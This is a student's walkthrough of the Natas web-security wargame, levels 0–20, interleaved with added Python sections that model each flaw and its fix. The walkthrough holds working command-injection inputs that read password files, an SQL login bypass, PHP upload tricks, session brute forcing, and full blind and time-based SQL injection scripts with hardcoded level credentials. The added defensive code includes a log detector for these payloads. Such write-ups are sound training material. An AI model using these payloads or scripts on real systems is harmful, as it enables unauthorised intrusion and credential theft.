Natas - Walkthrough


SNP - IE2012

G.D.I.Bomal - IT22032188

00/00/2023
The password to access Natas0 is given on the website itself.

Natas 0:
For this level, to obtain the password all you need to do is inspect the webpage by
right-clicking anywhere on the screen, then expand the tags; the password is given as a
comment.
Natas 1:
For this level, right-clicking has been blocked.

So in order to open the inspect menu all you need to do is use the keyboard.
Press Ctrl + Shift + I to open the inspect menu without right-clicking and expand the tags;
the password will be given as a comment.
Natas 2:
For this level, we can right-click again, but there is no commented password; instead, there is
an image with the src “files/pixel.png”.

To get the password we need to access the “files” directory

Then we can open the users.txt file and get the password
Natas 3:
In this level there is a comment saying “No more information leaks!! Not even Google will
find it this time…”, suggesting that the data has been hidden from Google.

This is where the “robots.txt” file comes in: robots.txt is a file used to manage crawler
traffic to the site, and it is also used to keep some files out of Google's index.

To see these files we just need to add the file path “/robots.txt” to the end of the URL of the
natas3 page.

Here we can see a directory that is hidden from crawlers, so let's put that at the end of the URL now
(replace /robots.txt with /s3cr3t/).

Now access the users.txt and get the password for the next level.
Natas 4:
To get the password for this level, the request has to look as if it came from the natas5 link
(the Referer header must be that URL). To do this we can use the Firefox browser or the
Burp Suite software (you need to create an account).

I used the Burp method:


First, we open the Burp app, go to the Proxy option, open the browser, and refresh the
page until it gives the full text.
Then turn on Intercept in the Burp app and refresh the page again to get the request, including
its Referer header, into Burp.

Now right-click it and click “Send to Repeater”, then go to the Repeater tab and change the
Referer to the link given on the natas4 webpage and click Send, then scroll down in the
Response section to get the password for natas5.
Natas 5:
For this level, the page says that we are not logged in, so all we need to do is change the cookie in
the inspect menu.

We change the “Value” from 0 to 1 and refresh the page.


Natas 6:
In this level we see that we have to enter a secret code, and we can view the source code.
When we view the source code we see that there is a file included:

To access the file we can simply add “/includes/secret.inc” to the end of the natas6 URL
We get the following page:

We can copy and paste this code into the natas6 webpage and get the password for natas7
Natas 7:
In this level, we can see 2 buttons, home and about. The buttons don't necessarily do
anything so we go to the inspect menu and see that they have said “hint: password for
webuser natas8 is in /etc/natas_webpass/natas8”

Now let's click either of the buttons and edit the URL.
Change the URL from
“http://natas7.natas.labs.overthewire.org/index.php?page=<home/about>” to
“http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8” and
you should get the password
Natas 8:
In this level, the password has been encoded and the encoded form is given to us.
The encodings are base64, strrev and bin2hex (base64, string reverse, and
binary to hex), so let's undo them in reverse order,
starting with bin2hex:

Next is string reverse:

And finally is base64:


Then we enter that code into the natas8 website and get the password:
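The three transformations in this level are encodings, not encryption: none of them takes a key, so anyone holding the output can reverse them in the opposite order. The following Python is an added example (not code from the walkthrough or from OverTheWire) that applies the same base64 → strrev → bin2hex chain and undoes it; the sample secret is a constructed value, not the level's real one.

```python
import base64
import binascii


def natas8_style_encode(secret: bytes) -> str:
    """Apply the chain the level uses: base64, then reverse, then bin2hex.
    Each step is keyless and reversible, so this hides nothing."""
    step1 = base64.b64encode(secret)        # base64_encode
    step2 = step1[::-1]                     # strrev
    return binascii.hexlify(step2).decode()  # bin2hex


def natas8_style_decode(encoded: str) -> bytes:
    """Undo the chain in reverse order: hex2bin, strrev, base64_decode."""
    step2 = binascii.unhexlify(encoded)      # hex2bin
    step1 = step2[::-1]                      # strrev
    return base64.b64decode(step1)           # base64_decode


# Constructed sample value (not the level's real secret).
SAMPLE_SECRET = b"constructed-sample-secret"


if __name__ == "__main__":
    encoded = natas8_style_encode(SAMPLE_SECRET)
    print(encoded)
    print(natas8_style_decode(encoded))
```

Because the decoder needs nothing but the output, the only thing the "obfuscation" buys is a few seconds of the reader's time; a secret that must stay secret has to be kept server-side or protected with a keyed primitive.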
Natas 9:
For this level, to get the password we have to inject Linux commands into the search bar
given on the website.
To do this we need to wrap the Linux command within semi-colons.
We can use the cat command to get the password from the /etc/natas_webpass/natas10
file.
Natas 10:
In this level, we can no longer inject Linux commands directly to read the password.
However, since the search is passed through “grep -i” we get a case-insensitive search,
so all we need to do is put in any letter (upper or lower case) and add
the path /etc/natas_webpass/natas11 after it, like so:

a /etc/natas_webpass/natas11

Since the password contains the letter ‘A’ and the search is case insensitive, the
password appeared.
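Both levels 9 and 10 come from the same root cause: a user-controlled string is spliced into a shell command line, so the shell (or grep's argument parsing) re-interprets it. The following Python is an added example, not code from the walkthrough or the game, contrasting the vulnerable shell-string form with the hardened argument-list form; the dictionary and secret files are constructed in a temporary directory so it runs offline, and it assumes `grep` is installed.

```python
import os
import subprocess
import tempfile


def run_grep_shell(key: str, dictionary: str) -> str:
    """Vulnerable form: the key is concatenated into a shell command line, so
    spaces, ';' and similar characters are parsed by the shell, not by grep."""
    return os.popen("grep -i " + key + " " + dictionary).read()


def run_grep_argv(key: str, dictionary: str) -> str:
    """Hardened form: no shell at all. The key is exactly one argv element and
    '--' stops grep from reading a key that starts with '-' as an option."""
    result = subprocess.run(
        ["grep", "-i", "--", key, dictionary],
        capture_output=True, text=True, check=False,
    )
    return result.stdout


def demo() -> tuple[str, str]:
    """Run both forms with the extra-path trick from level 10 and return
    (shell_output, argv_output)."""
    with tempfile.TemporaryDirectory() as d:
        dictionary = os.path.join(d, "dictionary.txt")
        secret = os.path.join(d, "secret.txt")
        with open(dictionary, "w") as f:
            f.write("apple\nbanana\ncherry\n")      # constructed word list
        with open(secret, "w") as f:
            f.write("natas-style-secret-constructed\n")  # constructed secret
        # Constructed key: a pattern followed by a second path, as in level 10.
        key = "a " + secret
        return run_grep_shell(key, dictionary), run_grep_argv(key, dictionary)


if __name__ == "__main__":
    shell_out, argv_out = demo()
    print("shell form leaked:", "constructed" in shell_out)
    print("argv form leaked:", "constructed" in argv_out)
```

With the argument list, the whole key (including the trailing path) becomes a single regular expression that grep runs against the dictionary only, so the secret file is never opened. The blacklist that level 10 adds is not needed once the shell is out of the picture.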
Natas 11:
In this level, we have to go through a long decryption process to get the password.
First let's start with the basic steps:
1. Go to the cookies section and find the “data” cookie, make sure it is URL-decoded,
and copy it
2. We can take that and decode it using a base64 decoder
3. Now that will be our ciphertext for the XOR decryption
4. To get the plaintext, we will have to JSON-encode the default data variable in the
source code
5. Finally we use our ciphertext and the plaintext we got to get the key for the next
decryption

6. Now that we have the key (KNHL) we can go to the CyberChef website and start
decoding/encoding to get the new cookie
7. First we enter the plaintext into the input field, then select the XOR recipe and enter
the “Key” as UTF8 and bake to get a new string
8. Next put the output into the input field and change the recipe to a base64 encoder
like so and bake; the result is the new cookie:

9. Finally, we take that output and replace the value of the data cookie in the natas11
website with the new output and refresh the page
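What makes the procedure above work is that XOR with a fixed repeating key has no integrity protection: XORing the known default plaintext with the ciphertext gives back the key stream, and the same key then encrypts whatever the client wants. The following Python is an added example, not code from the walkthrough or the game, that carries out the key recovery and forging steps on constructed values (the key `k3y!` is made up; the level's real key is not reproduced) and then shows the fix: an HMAC tag over the cookie body, which a client cannot produce without the server key.

```python
import base64
import hashlib
import hmac
import json
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (the cipher the level uses)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def to_json(data: dict) -> bytes:
    # PHP's json_encode emits no spaces; match that so the known plaintext lines up.
    return json.dumps(data, separators=(",", ":")).encode()


def recover_key(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """plaintext XOR ciphertext is the key repeated; return its shortest period."""
    stream = xor_bytes(known_plaintext, ciphertext)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


def forge_cookie(default_data: dict, observed_cookie_b64: str, new_data: dict) -> str:
    """Steps 5-8 of the walkthrough: recover the key, then encrypt chosen data."""
    key = recover_key(to_json(default_data), base64.b64decode(observed_cookie_b64))
    return base64.b64encode(xor_bytes(to_json(new_data), key)).decode()


def decrypt_cookie(cookie_b64: str, key: bytes) -> dict:
    """What the server does on receipt: base64-decode, XOR, JSON-decode."""
    return json.loads(xor_bytes(base64.b64decode(cookie_b64), key))


# --- the fix: authenticate the cookie with a server-side key ---------------

def seal(data: dict, server_key: bytes) -> str:
    body = to_json(data)
    tag = hmac.new(server_key, body, hashlib.sha256).digest()
    return base64.b64encode(body + tag).decode()


def open_sealed(cookie_b64: str, server_key: bytes):
    """Return the data only if the tag verifies; None on any tampering."""
    raw = base64.b64decode(cookie_b64)
    body, tag = raw[:-32], raw[-32:]
    expected = hmac.new(server_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(body)


# Constructed demo values; the level's real key and cookie are not reproduced.
DEMO_KEY = b"k3y!"
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def demo_cookie() -> str:
    """The cookie a server using DEMO_KEY would hand out for DEFAULT_DATA."""
    return base64.b64encode(xor_bytes(to_json(DEFAULT_DATA), DEMO_KEY)).decode()


if __name__ == "__main__":
    print("recovered key:", recover_key(to_json(DEFAULT_DATA),
                                        base64.b64decode(demo_cookie())))
    forged = forge_cookie(DEFAULT_DATA, demo_cookie(),
                          {"showpassword": "yes", "bgcolor": "#ffffff"})
    print("server decodes forged cookie as:", decrypt_cookie(forged, DEMO_KEY))
    sealed = seal(DEFAULT_DATA, b"server-secret")
    print("tampered sealed cookie accepted:", open_sealed("f" + sealed[1:], b"server-secret"))
```

The sealed variant still sends the data in the clear (that is fine for `bgcolor`); what it removes is the client's ability to change `showpassword` without the server noticing. If confidentiality were also needed, an authenticated encryption mode would replace both the XOR and the separate HMAC.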
Natas 12:
For this level, we have to upload something, and from the source code we can see that we can
try to upload a .php file to get the password.
First, let's make a .php file with any file name and the extension .php, and let's write this in
it:

Now we once again need Burp Suite to intercept the request and change the uploaded
extension from .jpg back to .php.
Load up Burp and go to Proxy, open its browser, log in to natas12, and select the
.php file there.
Before uploading, turn Intercept on in Burp Suite and then upload the file.
Then right-click in the Burp Suite app and click Send to Repeater.
Then change the extension of the file name from .jpg to .php.

Now click Send and check the response;


around line 22 there should be a path like this.
Copy that “upload/ug66qepr64.php” path and paste it in your address bar after the original
URL of the natas12 site like so (you will have to add some extra commands to get the
password, as shown below).

That is the password for natas13.


Natas 13:
This level is similar to the previous one; however, we can only upload jpg files.
We have to do the same thing again, but slightly differently:
1. First we select a random jpg file, turn Intercept on, and upload it
2. Now in Burp Suite, right-click and send to Repeater
3. In the Repeater you should see some garbage characters at the end; leave a few
lines (preferably 4 or 5) and write your PHP code to get the password (same as before,
but for natas14)
4. Then, like before, change the extension to .php but also change the content type to:
application/php
5. It should look like this:

6. Now click Send and copy the path given in the Response section
7. Paste it after the URL with the same command you used in level 12, like so, and
you will get the password

8. Copy the password given at the end and move on to the next level
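Levels 12 and 13 fail for the same reason: the stored filename's extension comes from the client, and in level 13 the only content check is a signature test on the leading bytes, which a file that starts with a JPEG header and continues with PHP passes. The following Python is an added example, not the game's code, with an upload handler modelled on the behaviour the walkthrough exploits beside a hardened one; the polyglot bytes are constructed and the PHP inside is a harmless placeholder.

```python
import secrets
from pathlib import PurePosixPath

JPEG_MAGIC = b"\xff\xd8\xff"
STORED_EXT = ".jpg"  # the server, not the client, decides the extension


def magic_check(data: bytes) -> bool:
    """An exif_imagetype-style test: looks at the first bytes only."""
    return data.startswith(JPEG_MAGIC)


def store_path_vulnerable(client_filename: str, data: bytes) -> str:
    """Modelled on what the walkthrough describes: random basename, but the
    extension is copied from the client-supplied filename. Level 12 has no
    content check; level 13 adds magic_check, which a polyglot still passes."""
    ext = PurePosixPath(client_filename).suffix
    return "upload/" + secrets.token_hex(5) + ext


def store_path_hardened(client_filename: str, client_content_type: str,
                        data: bytes):
    """Ignore the client's filename and Content-Type entirely. Check the
    signature, then store under a server-chosen name with a fixed image
    extension. Returns None when the content is rejected. The upload
    directory must also be served with script execution disabled; that is
    web-server configuration, not application code."""
    del client_filename, client_content_type  # deliberately unused
    if not magic_check(data):
        return None
    return "upload/" + secrets.token_hex(16) + STORED_EXT


# Constructed polyglot: JPEG signature followed by PHP source.
POLYGLOT = JPEG_MAGIC + b"\xe0" + b"<?php /* constructed placeholder */ ?>"


if __name__ == "__main__":
    print("vulnerable stores as:", store_path_vulnerable("pixel.php", POLYGLOT))
    print("magic check alone passes the polyglot:", magic_check(POLYGLOT))
    print("hardened stores as:",
          store_path_hardened("pixel.php", "application/php", POLYGLOT))
    print("hardened rejects non-image:",
          store_path_hardened("pixel.jpg", "image/jpeg", b"<?php") is None)
```

The hardened handler still accepts the polyglot, and that is the point: a signature check cannot tell a benign image from a crafted one, so the control that matters is that whatever is stored can never be executed (fixed extension plus a no-execute upload directory). Re-encoding the image with an image library before storing it is a further layer that strips trailing data.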
Natas 14:
For this level, we can bypass the username and password checks by entering an “always
true” statement.
Junk" OR 1=1# is an always-true statement.
The # is used so that MySQL ignores everything after it and only executes whatever comes
before it.
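The bypass works only because the query is assembled by string concatenation, so the closing quote and the comment marker in the input become part of the SQL. The following Python is an added example, not the game's code, running the vulnerable and the parameterized form against an in-memory SQLite table. SQLite uses `--` for comments where MySQL uses `#`, and this example quotes with single quotes, so the constructed payload is `Junk' OR 1=1-- ` rather than the level's exact string; the mechanism is the same.

```python
import sqlite3


def setup() -> sqlite3.Connection:
    """Constructed one-user table standing in for the level's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'constructed-pw')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The query text is built from user input, so quotes and comment markers
    in the input change the query's structure."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterized: the input is bound as a value and can never become SQL."""
    return conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


# Constructed payload; note the trailing space after '--' so SQLite sees a comment.
ALWAYS_TRUE = "Junk' OR 1=1-- "


if __name__ == "__main__":
    conn = setup()
    print("vulnerable:", login_vulnerable(conn, ALWAYS_TRUE, "wrong"))
    print("safe:      ", login_safe(conn, ALWAYS_TRUE, "wrong"))
```

In the parameterized call the database sees a username that literally equals `Junk' OR 1=1-- `, no user has that name, and the result is empty; no escaping logic is involved, which is why binding parameters is the fix rather than filtering characters.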
Natas 15:
For this level, we have to do a blind SQL injection to leak the password using a
Python program.

We need to create a Python program that loops through all the possible characters that could
be part of the password.

import requests
from string import ascii_lowercase, ascii_uppercase, digits

characters = ascii_lowercase + ascii_uppercase + digits

username = 'natas15'
password = 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB'
url = 'http://%s.natas.labs.overthewire.org/' % username

session = requests.Session()
seen_password = []   # characters of natas16's password found so far
done = False
while not done:
    found = False
    for ch in characters:
        # BINARY makes LIKE case sensitive; "#" comments out the rest of the query
        payload = 'natas16" AND BINARY password LIKE "' + "".join(seen_password) + ch + '%" #'
        response = session.post(url, data={"username": payload},
                                auth=(username, password))
        if 'user exists' in response.text:
            seen_password.append(ch)
            found = True
            break
        print("trying", "".join(seen_password) + ch)
    # stop at 32 characters, or if no character extended the prefix
    if len(seen_password) == 32 or not found:
        done = True
print("".join(seen_password))

Run that code and wait and the password will generate slowly
Natas 16:
For this level, we have the $key variable, which is checked character by character against
a blacklist; the command runs only if none of its characters is in the blacklist.

grep uses regular expressions, so we can use special characters like ^ (caret), which anchors
the pattern to the start of the string.

Imagine ^a. If the letter a is the very first character of the password, the inner grep
outputs it and the outer search shows no results. So the signal for a correct guess is
that nothing shows up, and we build up a list of the letters for which that happens.

Again we need a Python script to leak the password for natas17.
This time we have changed the code a bit, to this:
import requests
import re
from string import ascii_lowercase, ascii_uppercase, digits

characters = ascii_lowercase + ascii_uppercase + digits

username = 'natas16'
password = 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V'
url = 'http://%s.natas.labs.overthewire.org/' % username

session = requests.Session()
seen_password = []   # characters of natas17's password found so far
done = False
while not done:
    found = False
    for ch in characters:
        # $(grep ^<prefix> file) expands to the password line when the prefix matches,
        # which makes the outer grep find nothing: an empty <pre> means "correct"
        needle = ("anythings$(grep ^" + "".join(seen_password) + ch +
                  " /etc/natas_webpass/natas17)")
        response = session.post(url, data={"needle": needle},
                                auth=(username, password))
        itreturned = re.findall(r'<pre>\n(.*)\n</pre>', response.text)
        if not itreturned:
            seen_password.append(ch)
            print("trying", "".join(seen_password))
            found = True
            break
    # stop at 32 characters, or if no character extended the prefix
    if len(seen_password) == 32 or not found:
        done = True
print("".join(seen_password))

Run it and it will slowly generate the password


Natas 17:
Here we can no longer use the blind SQL attack from before, as the output that shows
whether a user exists or not has been commented out.

To overcome this we will use the sleep function. Whenever a character is in the
password the query will sleep for a second, and we can use that to measure the time
difference: if the response takes longer than expected, it means that the
character exists in the password.

import requests

# Length of the password
pwd_len = 32

# charset_0: characters to test; charset_1: those confirmed to be in the password
charset_0 = (
    '0123456789' +
    'abcdefghijklmnopqrstuvwxyz' +
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
)
charset_1 = ''

# Target URL and authentication credentials
target = 'http://natas17.natas.labs.overthewire.org'
auth = ('natas17', 'XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd')
sleep_time = 15

# Pass 1: find which characters of charset_0 occur anywhere in the password
for c in charset_0:
    # The query sleeps only if the character exists somewhere in the password
    username = 'natas18" AND IF(password LIKE BINARY "%%%c%%",SLEEP(%d), 1)#' % (c, sleep_time)

    # Send a GET request to the target with the payload
    r = requests.get(target, auth=auth, params={"username": username})

    # Measure the elapsed time of the response in seconds
    s = r.elapsed.total_seconds()
    # A response that took at least sleep_time means the character exists
    if s >= sleep_time:
        charset_1 += c
        print('C: ' + charset_1.ljust(len(charset_0), '*'))

print("")

# Pass 2: build the password one character at a time using only charset_1
password = ""

while len(password) != pwd_len:
    for c in charset_1:
        # Candidate prefix: the password found so far plus one more character
        t = password + c

        # The query sleeps only if the password starts with this prefix
        username = 'natas18" AND IF(password LIKE BINARY "%s%%",SLEEP(%d), 1)#' % (t, sleep_time)

        # Send a GET request to the target with the payload
        r = requests.get(target, auth=auth, params={"username": username})

        # Measure the elapsed time of the response in seconds
        s = r.elapsed.total_seconds()

        # A response that took at least sleep_time means the prefix is correct
        if s >= sleep_time:
            print('P: ' + t.ljust(pwd_len, '*'))
            password = t
            break
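From the server's side, the scripts for levels 15 to 17 leave a very recognisable trail: hundreds of requests from one client to one endpoint whose parameter contains SQL or shell fragments, and (for level 17) responses that take exactly the injected delay. The following Python is an added example, not part of the walkthrough, that runs a small detector over constructed access-log lines; the log format (combined log plus a trailing request-duration field in seconds) and the sample entries are made up for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures of the probes the three scripts send: conditional delays,
# case-sensitive LIKE prefix tests, shell command substitution, the secret path.
INJECTION_PATTERNS = re.compile(
    r"SLEEP\s*\(|BENCHMARK\s*\(|LIKE\s+BINARY|\$\(|/etc/natas_webpass",
    re.IGNORECASE,
)

# Constructed format: combined log line followed by the request duration in seconds.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<secs>[\d.]+)$'
)

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /?username=natas18%22+AND+IF(password+LIKE+BINARY+%22%25a%25%22,SLEEP(15),1)%23 HTTP/1.1" 200 1043 15.02
10.0.0.5 - - [01/Jan/2023:10:00:16 +0000] "GET /?username=natas18%22+AND+IF(password+LIKE+BINARY+%22%25b%25%22,SLEEP(15),1)%23 HTTP/1.1" 200 1043 0.04
10.0.0.5 - - [01/Jan/2023:10:00:17 +0000] "POST /?needle=anythings%24%28grep+%5Ea+/etc/natas_webpass/natas17%29 HTTP/1.1" 200 986 0.03
192.0.2.9 - - [01/Jan/2023:10:01:00 +0000] "GET /?username=alice HTTP/1.1" 200 1020 0.05
"""


def analyze(lines, slow_threshold: float = 5.0, probe_threshold: int = 2):
    """Return [(line_number, client_ip, reasons)] for every suspicious line.

    reasons: 'injection-pattern' when the decoded request matches a signature,
    'slow-response' when the server took >= slow_threshold seconds (a SLEEP()
    that fired), 'repeated-probing' once a client has sent probe_threshold or
    more matching requests (the character-by-character loop)."""
    probes_per_client = defaultdict(int)
    findings = []
    for number, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these too
        reasons = []
        decoded = unquote_plus(m["target"])  # look at what the app actually saw
        if INJECTION_PATTERNS.search(decoded):
            reasons.append("injection-pattern")
            probes_per_client[m["ip"]] += 1
            if probes_per_client[m["ip"]] >= probe_threshold:
                reasons.append("repeated-probing")
        if float(m["secs"]) >= slow_threshold:
            reasons.append("slow-response")
        if reasons:
            findings.append((number, m["ip"], reasons))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG.splitlines()):
        print(finding)
```

Decoding the query before matching matters: the scripts send `SLEEP(15)` and `$(` URL-encoded, so a pattern applied to the raw line would miss them. The duration field is the most robust signal for level 17 in particular, since the injected delay shows up as a cluster of responses at exactly the chosen sleep time while the rest of the site answers in milliseconds.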
Natas 18:
For this level, we are supposed to log in with the admin account, and by looking at the source
code we can deduce that there has to be one session ID that belongs to the admin.

We also see that there is a maxid variable set to 640, so there are only 640 IDs to go through.
Now that we know this, we can start up Burp Suite and do the following steps:
1. First open up the browser from Burp and log in to natas18
2. Now turn on Intercept and log in without credentials; we should see a line that
shows PHPSESSID and a value, and if that is there we continue

3. Now we right-click and click Send to Intruder


4. In the Intruder menu we highlight the value of PHPSESSID and click Add
5. Then set the attack type to Sniper

6. Now we go to the Payloads tab and enter the details as follows


We can set the from and to values to 1 and 640 respectively, but this was just the way
I did it
7. Next we go to the Settings menu, go to Grep - Extract and click Add
8. In the pop-up menu we make the following changes and click Fetch response
9. Then highlight the line as shown and click OK

10. Now we can just click Start attack and wait until we see an entry where we are logged in
as admin; click it, go to the Response tab and scroll, and you should find the
password
Natas 19:
In this level, it's the same code as last time, but this time the session IDs are no longer
sequential.
So let's try the same thing again; this time we get a different-looking PHPSESSID, and I'm assuming
they have encoded it.

Let's send it to the Decoder and see.


Let's assume the username is admin and try to find the password by using the Intruder
again with the same settings as before, but this time we can remove the Grep - Extract and
add a payload processing rule.
Now we can start the attack and monitor the response length to find the unique one.

AND WE GOT THE PASSWORD!
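Levels 18 and 19 are both about session identifiers an attacker can enumerate: level 18 draws them from a range of 640 numbers, and level 19 derives them from a number and the username, so hex-decoding the ID shows its structure. The following Python is an added example, not the game's code, with a sequential session store modelled on what the walkthrough describes beside one that uses the OS random generator; the "admin" session and the 99 users created before it are constructed, and the structure check is a heuristic of my own, not a published rule.

```python
import binascii
import secrets
import string


class SequentialSessions:
    """Modelled on level 18: IDs are integers in 1..maxid, so every live
    session can be reached within maxid guesses."""

    def __init__(self, maxid: int = 640):
        self.maxid = maxid
        self.sessions = {}
        self._next = 1

    def create(self, user: str) -> str:
        sid = str(self._next)
        self._next = self._next % self.maxid + 1
        self.sessions[sid] = user
        return sid

    def lookup(self, sid: str):
        return self.sessions.get(sid)

    def candidate_ids(self):
        return (str(i) for i in range(1, self.maxid + 1))


class RandomSessions:
    """Hardened: 256 bits from the OS CSPRNG; enumeration is infeasible."""

    def __init__(self):
        self.sessions = {}

    def create(self, user: str) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = user
        return sid

    def lookup(self, sid: str):
        return self.sessions.get(sid)


def guesses_to_find_admin(store, candidates, limit: int = 640):
    """Count how many candidate IDs it takes to land on the admin session
    within `limit` tries (the Intruder run from the walkthrough); None if
    the budget runs out."""
    for n, sid in enumerate(candidates, 1):
        if n > limit:
            return None
        if store.lookup(sid) == "admin":
            return n
    return None


def looks_structured(session_id: str) -> bool:
    """Heuristic for level-19-style IDs: if the hex decodes to printable text,
    the ID is derived from readable data rather than random bytes."""
    try:
        raw = binascii.unhexlify(session_id).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return False
    return len(raw) > 0 and all(c in string.printable for c in raw)


def demo():
    seq = SequentialSessions()
    for i in range(99):                 # constructed: 99 ordinary users first
        seq.create("user%d" % i)
    seq.create("admin")
    rnd = RandomSessions()
    rnd.create("admin")
    random_guesses = (secrets.token_urlsafe(32) for _ in range(640))
    return (guesses_to_find_admin(seq, seq.candidate_ids()),
            guesses_to_find_admin(rnd, random_guesses))


if __name__ == "__main__":
    print("sequential store, guesses to admin:", demo()[0])
    print("random store, found within 640 guesses:", demo()[1])
    print("hex('281-admin') looks structured:",
          looks_structured(binascii.hexlify(b"281-admin").decode()))
```

Session IDs must be unguessable and carry no meaning: the identifier is only a lookup key, and everything about the user (including whether they are admin) belongs in the server-side record it points to.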


Natas 20:
For this level, what we should do is inject the name “admin” into the session file and make sure the admin flag is set.

First let's open up Burp and open the browser.


Now let's enter admin as the name, turn on Intercept, and then click Change name.

Now we can right-click in Burp and send to Repeater.

In Repeater we should change the following:


1. PHPSESSID
2. name

Change the PHPSESSID to anything of your preference (I put my name).


Change the name to the following:
<random string>%0Aadmin 1
(my <random string> was whatever)

GOT THE PASSWORD!
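The `%0A` in that payload is a newline, and the session file is a list of `key value` lines that is split on newlines when read back, so a name containing a newline writes an extra `admin 1` record. The following Python is an added example, not the game's code, with a serializer and parser modelled on that behaviour, the same serializer with the newline check it was missing, and a JSON encoding that has no such in-band delimiter; the sample name is the walkthrough's own `whatever` with the newline decoded.

```python
import json


def serialize_lines(data: dict) -> str:
    """Vulnerable: one 'key value' line per entry; values are written raw."""
    return "".join("%s %s\n" % (key, value) for key, value in data.items())


def parse_lines(blob: str) -> dict:
    """Reads the file back by splitting on newlines, then on the first space."""
    out = {}
    for line in blob.split("\n"):
        if " " in line:
            key, value = line.split(" ", 1)
            out[key] = value
    return out


def session_after_rename_vulnerable(name: str) -> dict:
    """What the session looks like after the user sets `name` and the app
    writes and re-reads it."""
    return parse_lines(serialize_lines({"name": name}))


def serialize_lines_safe(data: dict) -> str:
    """Same format, but refuses any field that could break the line structure."""
    for key, value in data.items():
        text = "%s%s" % (key, value)
        if "\n" in text or "\r" in text or " " in key:
            raise ValueError("session fields may not contain newlines; keys may not contain spaces")
    return serialize_lines(data)


def session_after_rename_json(name: str) -> dict:
    """Structured encoding: the newline stays inside the string value."""
    return json.loads(json.dumps({"name": name}))


# Constructed input: the walkthrough's payload with %0A URL-decoded.
PAYLOAD_NAME = "whatever\nadmin 1"


if __name__ == "__main__":
    print("vulnerable:", session_after_rename_vulnerable(PAYLOAD_NAME))
    print("json:      ", session_after_rename_json(PAYLOAD_NAME))
    try:
        serialize_lines_safe({"name": PAYLOAD_NAME})
    except ValueError as e:
        print("safe serializer refused:", e)
```

Rejecting newlines fixes this particular file format, but the more general lesson is the same one as for SQL: a hand-rolled text format with in-band delimiters turns every untrusted value into a potential record boundary, and a structured encoder removes that class of bug rather than one instance of it.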
